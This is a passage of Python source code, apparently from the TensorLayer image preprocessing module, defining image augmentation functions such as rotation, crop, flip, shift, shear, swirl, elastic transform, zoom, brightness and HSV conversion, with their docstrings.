return np.concatenate(results)
def rotation(
x, rg=20, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0., order=1
):
"""Rotate an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
rg : int or float
Degree to rotate, usually 0 ~ 180.
is_random : boolean
If True, randomly rotate. Default is False
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode=`constant`. Default is 0.0
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x --> [row, col, 1]
>>> x = tl.prepro.rotation(x, rg=40, is_random=False)
>>> tl.vis.save_image(x, 'im.png')
"""
if is_random:
theta = np.pi / 180 * np.random.uniform(-rg, rg)
else:
theta = np.pi / 180 * rg
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(rotation_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def rotation_multi(
x, rg=20, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0., order=1
):
"""Rotate multiple images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.rotation``.
Returns
-------
numpy.array
A list of processed images.
Examples
--------
>>> x, y --> [row, col, 1] greyscale
>>> x, y = tl.prepro.rotation_multi([x, y], rg=90, is_random=False)
"""
if is_random:
theta = np.pi / 180 * np.random.uniform(-rg, rg)
else:
theta = np.pi / 180 * rg
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(rotation_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# crop
def crop(x, wrg, hrg, is_random=False, row_index=0, col_index=1):
"""Randomly or centrally crop an image.
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
wrg : int
Size of width.
hrg : int
Size of height.
is_random : boolean,
If True, randomly crop, else central crop. Default is False.
row_index: int
index of row.
col_index: int
index of column.
Returns
-------
numpy.array
A processed image.
"""
h, w = x.shape[row_index], x.shape[col_index]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
# tl.logging.info(h_offset, w_offset, x[h_offset: hrg+h_offset ,w_offset: wrg+w_offset].shape)
return x[h_offset:hrg + h_offset, w_offset:wrg + w_offset]
else: # central crop
h_offset = int(np.floor((h - hrg) / 2.))
w_offset = int(np.floor((w - wrg) / 2.))
h_end = h_offset + hrg
w_end = w_offset + wrg
return x[h_offset:h_end, w_offset:w_end]
# old implementation
# h_offset = (h - hrg)/2
# w_offset = (w - wrg)/2
# tl.logging.info(x[h_offset: h-h_offset ,w_offset: w-w_offset].shape)
# return x[h_offset: h-h_offset ,w_offset: w-w_offset]
# central crop
def crop_multi(x, wrg, hrg, is_random=False, row_index=0, col_index=1):
"""Randomly or centrally crop multiple images.
Parameters
----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.crop``.
Returns
-------
numpy.array
A list of processed images.
"""
h, w = x[0].shape[row_index], x[0].shape[col_index]
if (h <= hrg) or (w <= wrg):
raise AssertionError("The size of cropping should smaller than the original image")
if is_random:
h_offset = int(np.random.uniform(0, h - hrg) - 1)
w_offset = int(np.random.uniform(0, w - wrg) - 1)
results = []
for data in x:
results.append(data[h_offset:hrg + h_offset, w_offset:wrg + w_offset])
return np.asarray(results)
else:
# central crop
h_offset = (h - hrg) / 2
w_offset = (w - wrg) / 2
results = []
for data in x:
results.append(data[h_offset:h - h_offset, w_offset:w - w_offset])
return np.asarray(results)
# flip
def flip_axis(x, axis=1, is_random=False):
"""Flip the axis of an image, such as flip left and right, up and down, randomly or non-randomly,
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
axis : int
Which axis to flip.
- 0, flip up and down
- 1, flip left and right
- 2, flip channel
is_random : boolean
If True, randomly flip. Default is False.
Returns
-------
numpy.array
A processed image.
"""
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
else:
return x
else:
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
def flip_axis_multi(x, axis, is_random=False):
"""Flip the axises of multiple images together, such as flip left and right, up and down, randomly or non-randomly,
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.flip_axis``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
# x = np.asarray(x).swapaxes(axis, 0)
# x = x[::-1, ...]
# x = x.swapaxes(0, axis)
# return x
results = []
for data in x:
data = np.asarray(data).swapaxes(axis, 0)
data = data[::-1, ...]
data = data.swapaxes(0, axis)
results.append(data)
return np.asarray(results)
else:
return np.asarray(x)
else:
# x = np.asarray(x).swapaxes(axis, 0)
# x = x[::-1, ...]
# x = x.swapaxes(0, axis)
# return x
results = []
for data in x:
data = np.asarray(data).swapaxes(axis, 0)
data = data[::-1, ...]
data = data.swapaxes(0, axis)
results.append(data)
return np.asarray(results)
# shift
def shift(
x, wrg=0.1, hrg=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shift an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
wrg : float
Percentage of shift in axis x, usually -0.25 ~ 0.25.
hrg : float
Percentage of shift in axis y, usually -0.25 ~ 0.25.
is_random : boolean
If True, randomly shift. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
"""
h, w = x.shape[row_index], x.shape[col_index]
if is_random:
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
else:
tx, ty = hrg * h, wrg * w
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def shift_multi(
x, wrg=0.1, hrg=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shift images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shift``.
Returns
-------
numpy.array
A list of processed images.
"""
h, w = x[0].shape[row_index], x[0].shape[col_index]
if is_random:
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
else:
tx, ty = hrg * h, wrg * w
translation_matrix = np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]])
transform_matrix = translation_matrix # no need to do offset
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# shear
def shear(
x, intensity=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
intensity : float
Percentage of shear, usually -0.5 ~ 0.5 (is_random==True), 0 ~ 0.5 (is_random==False),
you can have a quick try by shear(X, 1).
is_random : boolean
If True, randomly shear. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
References
-----------
- `Affine transformation <https://uk.mathworks.com/discovery/affine-transformation.html>`__
"""
if is_random:
shear = np.random.uniform(-intensity, intensity)
else:
shear = intensity
shear_matrix = np.array([[1, -np.sin(shear), 0], [0, np.cos(shear), 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def shear_multi(
x, intensity=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shear``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
shear = np.random.uniform(-intensity, intensity)
else:
shear = intensity
shear_matrix = np.array([[1, -np.sin(shear), 0], [0, np.cos(shear), 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
def shear2(
x, shear=(0.1, 0.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear an image randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
shear : tuple of two floats
Percentage of shear for height and width direction (0, 1).
is_random : boolean
If True, randomly shear. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
References
-----------
- `Affine transformation <https://uk.mathworks.com/discovery/affine-transformation.html>`__
"""
if len(shear) != 2:
raise AssertionError(
"shear should be tuple of 2 floats, or you want to use tl.prepro.shear rather than tl.prepro.shear2 ?"
)
if is_random:
shear[0] = np.random.uniform(-shear[0], shear[0])
shear[1] = np.random.uniform(-shear[1], shear[1])
shear_matrix = np.array([[1, shear[0], 0], [shear[1], 1, 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def shear_multi2(
x, shear=(0.1, 0.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
order=1
):
"""Shear images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.shear2``.
Returns
-------
numpy.array
A list of processed images.
"""
if len(shear) != 2:
raise AssertionError(
"shear should be tuple of 2 floats, or you want to use tl.prepro.shear_multi rather than tl.prepro.shear_multi2 ?"
)
if is_random:
shear[0] = np.random.uniform(-shear[0], shear[0])
shear[1] = np.random.uniform(-shear[1], shear[1])
shear_matrix = np.array([[1, shear[0], 0], [shear[1], 1, 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# swirl
def swirl(
x, center=None, strength=1, radius=100, rotation=0, output_shape=None, order=1, mode='constant', cval=0,
clip=True, preserve_range=False, is_random=False
):
"""Swirl an image randomly or non-randomly, see `scikit-image swirl API <http://scikit-image.org/docs/dev/api/skimage.transform.html#skimage.transform.swirl>`__
and `example <http://scikit-image.org/docs/dev/auto_examples/plot_swirl.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
center : tuple or 2 int or None
Center coordinate of transformation (optional).
strength : float
The amount of swirling applied.
radius : float
The extent of the swirl in pixels. The effect dies out rapidly beyond radius.
rotation : float
Additional rotation applied to the image, usually [0, 360], relates to center.
output_shape : tuple of 2 int or None
Shape of the output image generated (height, width). By default the shape of the input image is preserved.
order : int, optional
The order of the spline interpolation, default is 1. The order has to be in the range 0-5. See skimage.transform.warp for detail.
mode : str
One of `constant` (default), `edge`, `symmetric` `reflect` and `wrap`.
Points outside the boundaries of the input are filled according to the given mode, with `constant` used as the default. Modes match the behaviour of numpy.pad.
cval : float
Used in conjunction with mode `constant`, the value outside the image boundaries.
clip : boolean
Whether to clip the output to the range of values of the input image. This is enabled by default, since higher order interpolation may produce values outside the given input range.
preserve_range : boolean
Whether to keep the original range of values. Otherwise, the input image is converted according to the conventions of img_as_float.
is_random : boolean,
If True, random swirl. Default is False.
- random center = [(0 ~ x.shape[0]), (0 ~ x.shape[1])]
- random strength = [0, strength]
- random radius = [1e-10, radius]
- random rotation = [-rotation, rotation]
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x --> [row, col, 1] greyscale
>>> x = tl.prepro.swirl(x, strength=4, radius=100)
"""
if radius == 0:
raise AssertionError("Invalid radius value")
rotation = np.pi / 180 * rotation
if is_random:
center_h = int(np.random.uniform(0, x.shape[0]))
center_w = int(np.random.uniform(0, x.shape[1]))
center = (center_h, center_w)
strength = np.random.uniform(0, strength)
radius = np.random.uniform(1e-10, radius)
rotation = np.random.uniform(-rotation, rotation)
max_v = np.max(x)
if max_v > 1: # Note: the input of this fn should be [-1, 1], rescale is required.
x = x / max_v
swirled = skimage.transform.swirl(
x, center=center, strength=strength, radius=radius, rotation=rotation, output_shape=output_shape, order=order,
mode=mode, cval=cval, clip=clip, preserve_range=preserve_range
)
if max_v > 1:
swirled = swirled * max_v
return swirled
def swirl_multi(
x, center=None, strength=1, radius=100, rotation=0, output_shape=None, order=1, mode='constant', cval=0,
clip=True, preserve_range=False, is_random=False
):
"""Swirl multiple images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.swirl``.
Returns
-------
numpy.array
A list of processed images.
"""
if radius == 0:
raise AssertionError("Invalid radius value")
rotation = np.pi / 180 * rotation
if is_random:
center_h = int(np.random.uniform(0, x[0].shape[0]))
center_w = int(np.random.uniform(0, x[0].shape[1]))
center = (center_h, center_w)
strength = np.random.uniform(0, strength)
radius = np.random.uniform(1e-10, radius)
rotation = np.random.uniform(-rotation, rotation)
results = []
for data in x:
max_v = np.max(data)
if max_v > 1: # Note: the input of this fn should be [-1, 1], rescale is required.
data = data / max_v
swirled = skimage.transform.swirl(
data, center=center, strength=strength, radius=radius, rotation=rotation, output_shape=output_shape,
order=order, mode=mode, cval=cval, clip=clip, preserve_range=preserve_range
)
if max_v > 1:
swirled = swirled * max_v
results.append(swirled)
return np.asarray(results)
# elastic_transform
def elastic_transform(x, alpha, sigma, mode="constant", cval=0, is_random=False):
"""Elastic transformation for image as described in `[Simard2003] <http://deeplearning.cs.cmu.edu/pdfs/Simard.pdf>`__.
Parameters
-----------
x : numpy.array
A greyscale image.
alpha : float
Alpha value for elastic transformation.
sigma : float or sequence of float
The smaller the sigma, the more transformation. Standard deviation for Gaussian kernel. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes.
mode : str
See `scipy.ndimage.filters.gaussian_filter <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.filters.gaussian_filter.html>`__. Default is `constant`.
cval : float,
Used in conjunction with `mode` of `constant`, the value outside the image boundaries.
is_random : boolean
Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
>>> x = tl.prepro.elastic_transform(x, alpha=x.shape[1]*3, sigma=x.shape[1]*0.07)
References
------------
- `Github <https://gist.github.com/chsasank/4d8f68caf01f041a6453e67fb30f8f5a>`__.
- `Kaggle <https://www.kaggle.com/pscion/ultrasound-nerve-segmentation/elastic-transform-for-data-augmentation-0878921a>`__
"""
if is_random is False:
random_state = np.random.RandomState(None)
else:
random_state = np.random.RandomState(int(time.time()))
#
is_3d = False
if len(x.shape) == 3 and x.shape[-1] == 1:
x = x[:, :, 0]
is_3d = True
elif len(x.shape) == 3 and x.shape[-1] != 1:
raise Exception("Only support greyscale image")
if len(x.shape) != 2:
raise AssertionError("input should be grey-scale image")
shape = x.shape
dx = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode=mode, cval=cval) * alpha
dy = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode=mode, cval=cval) * alpha
x_, y_ = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
indices = np.reshape(x_ + dx, (-1, 1)), np.reshape(y_ + dy, (-1, 1))
if is_3d:
return map_coordinates(x, indices, order=1).reshape((shape[0], shape[1], 1))
else:
return map_coordinates(x, indices, order=1).reshape(shape)
def elastic_transform_multi(x, alpha, sigma, mode="constant", cval=0, is_random=False):
"""Elastic transformation for images as described in `[Simard2003] <http://deeplearning.cs.cmu.edu/pdfs/Simard.pdf>`__.
Parameters
-----------
x : list of numpy.array
List of greyscale images.
others : args
See ``tl.prepro.elastic_transform``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random is False:
random_state = np.random.RandomState(None)
else:
random_state = np.random.RandomState(int(time.time()))
shape = x[0].shape
if len(shape) == 3:
shape = (shape[0], shape[1])
new_shape = random_state.rand(*shape)
results = []
for data in x:
is_3d = False
if len(data.shape) == 3 and data.shape[-1] == 1:
data = data[:, :, 0]
is_3d = True
elif len(data.shape) == 3 and data.shape[-1] != 1:
raise Exception("Only support greyscale image")
if len(data.shape) != 2:
raise AssertionError("input should be grey-scale image")
dx = gaussian_filter((new_shape * 2 - 1), sigma, mode=mode, cval=cval) * alpha
dy = gaussian_filter((new_shape * 2 - 1), sigma, mode=mode, cval=cval) * alpha
x_, y_ = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
indices = np.reshape(x_ + dx, (-1, 1)), np.reshape(y_ + dy, (-1, 1))
# tl.logging.info(data.shape)
if is_3d:
results.append(map_coordinates(data, indices, order=1).reshape((shape[0], shape[1], 1)))
else:
results.append(map_coordinates(data, indices, order=1).reshape(shape))
return np.asarray(results)
# zoom
def zoom(
x, zoom_range=(0.9, 1.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1
):
"""Zoom in and out of a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
zoom_range : list or tuple
Zoom range for height and width.
- If is_random=False, (h, w) are the fixed zoom factor for row and column axies, factor small than one is zoom in.
- If is_random=True, (h, w) are (min zoom out, max zoom out) for x and y with different random zoom in/out factor, e.g (0.5, 1) zoom in 1~2 times.
is_random : boolean
If True, randomly zoom. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
"""
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
# tl.logging.info(zx, zy)
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def zoom_multi(
x, zoom_range=(0.9, 1.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1
):
"""Zoom in and out of images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.zoom``.
Returns
-------
numpy.array
A list of processed images.
"""
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
# x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval)
# return x
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# image = tf.image.random_brightness(image, max_delta=32. / 255.)
# image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
# image = tf.image.random_hue(image, max_delta=0.032)
# image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
def brightness(x, gamma=1, gain=1, is_random=False):
"""Change the brightness of a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
gamma : float
Non negative real number. Default value is 1.
- Small than 1 means brighter.
- If `is_random` is True, gamma in a range of (1-gamma, 1+gamma).
gain : float
The constant multiplier. Default value is 1.
is_random : boolean
If True, randomly change brightness. Default is False.
Returns
-------
numpy.array
A processed image.
References
-----------
- `skimage.exposure.adjust_gamma <http://scikit-image.org/docs/dev/api/skimage.exposure.html>`__
- `chinese blog <http://www.cnblogs.com/denny402/p/5124402.html>`__
"""
if is_random:
gamma = np.random.uniform(1 - gamma, 1 + gamma)
x = exposure.adjust_gamma(x, gamma, gain)
return x
def brightness_multi(x, gamma=1, gain=1, is_random=False):
"""Change the brightness of multiply images, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpyarray
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.brightness``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
gamma = np.random.uniform(1 - gamma, 1 + gamma)
results = []
for data in x:
results.append(exposure.adjust_gamma(data, gamma, gain))
return np.asarray(results)
def illumination(x, gamma=1., contrast=1., saturation=1., is_random=False):
"""Perform illumination augmentation for a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
gamma : float
Change brightness (the same with ``tl.prepro.brightness``)
- if is_random=False, one float number, small than one means brighter, greater than one means darker.
- if is_random=True, tuple of two float numbers, (min, max).
contrast : float
Change contrast.
- if is_random=False, one float number, small than one means blur.
- if is_random=True, tuple of two float numbers, (min, max).
saturation : float
Change saturation.
- if is_random=False, one float number, small than one means unsaturation.
- if is_random=True, tuple of two float numbers, (min, max).
is_random : boolean
If True, randomly change illumination. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random
>>> x = tl.prepro.illumination(x, gamma=(0.5, 5.0), contrast=(0.3, 1.0), saturation=(0.7, 1.0), is_random=True)
Non-random
>>> x = tl.prepro.illumination(x, 0.5, 0.6, 0.8, is_random=False)
"""
if is_random:
if not (len(gamma) == len(contrast) == len(saturation) == 2):
raise AssertionError("if is_random = True, the arguments are (min, max)")
## random change brightness # small --> brighter
illum_settings = np.random.randint(0, 3) # 0-brighter, 1-darker, 2 keep normal
if illum_settings == 0: # brighter
gamma = np.random.uniform(gamma[0], 1.0) # (.5, 1.0)
elif illum_settings == 1: # darker
gamma = np.random.uniform(1.0, gamma[1]) # (1.0, 5.0)
else:
gamma = 1
im_ = brightness(x, gamma=gamma, gain=1, is_random=False)
# tl.logging.info("using contrast and saturation")
image = PIL.Image.fromarray(im_) # array -> PIL
contrast_adjust = PIL.ImageEnhance.Contrast(image)
image = contrast_adjust.enhance(np.random.uniform(contrast[0], contrast[1])) #0.3,0.9))
saturation_adjust = PIL.ImageEnhance.Color(image)
image = saturation_adjust.enhance(np.random.uniform(saturation[0], saturation[1])) # (0.7,1.0))
im_ = np.array(image) # PIL -> array
else:
im_ = brightness(x, gamma=gamma, gain=1, is_random=False)
image = PIL.Image.fromarray(im_) # array -> PIL
contrast_adjust = PIL.ImageEnhance.Contrast(image)
image = contrast_adjust.enhance(contrast)
saturation_adjust = PIL.ImageEnhance.Color(image)
image = saturation_adjust.enhance(saturation)
im_ = np.array(image) # PIL -> array
return np.asarray(im_)
def rgb_to_hsv(rgb):
"""Input RGB image [0~255] return HSV image [0~1].
Parameters
------------
rgb : numpy.array
An image with values between 0 and 255.
Returns
-------
numpy.array
A processed image.
"""
# Translated from source of colorsys.rgb_to_hsv
# r,g,b should be a numpy arrays with values between 0 and 255
# rgb_to_hsv returns an array of floats between 0.0 and 1.0.
rgb = rgb.astype('float')
hsv = np.zeros_like(rgb)
# in case an RGBA array was passed, just copy the A channel
hsv[..., 3:] = rgb[..., 3:]
r, g, b = rgb[..., 0], rgb[..., 1], rgb[..., 2]
maxc = np.max(rgb[..., :3], axis=-1)
minc = np.min(rgb[..., :3], axis=-1)
hsv[..., 2] = maxc
mask = maxc != minc
hsv[mask, 1] = (maxc - minc)[mask] / maxc[mask]
rc = np.zeros_like(r)
gc = np.zeros_like(g)
bc = np.zeros_like(b)
rc[mask] = (maxc - r)[mask] / (maxc - minc)[mask]
gc[mask] = (maxc - g)[mask] / (maxc - minc)[mask]
bc[mask] = (maxc - b)[mask] / (maxc - minc)[mask]
hsv[..., 0] = np.select([r == maxc, g == maxc], [bc - gc, 2.0 + rc - bc], default=4.0 + gc - rc)
hsv[..., 0] = (hsv[..., 0] / 6.0) % 1.0
return hsv
def hsv_to_rgb(hsv):
"""Input HSV image [0~1] return RGB image [0~255].
Parameters
-------------
hsv : numpy.array
An image with values between 0.0 and 1.0
Returns
-------
numpy.array
A processed image.
"""
# Translated from source of colorsys.hsv_to_rgb
# h,s should be a numpy arrays with values between 0.0 and 1.0
# v should be a numpy array with values between 0.0 and 255.0
# hsv_to_rgb returns an array of uints between 0 and 255.
rgb = np.empty_like(hsv)
rgb[..., 3:] = hsv[..., 3:]
h, s, v = hsv[..., 0], hsv[..., 1], hsv[..., 2]
i = (h * 6.0).astype('uint8')
f = (h * 6.0) - i
p = v * (1.0 - s)
q = v * (1.0 - s * f)
t = v * (1.0 - s * (1.0 - f))
i = i % 6
conditions = [s == 0.0, i == 1, i == 2, i == 3, i == 4, i == 5]
rgb[..., 0] = np.select(conditions, [v, q, p, p, t, v], default=v)
rgb[..., 1] = np.select(conditions, [v, v, v, q, p, p], default=t)
rgb[..., 2] = np.select(conditions, [v, p, t, v, v, q], default=p)
return rgb.astype('uint8')
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False):
"""Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
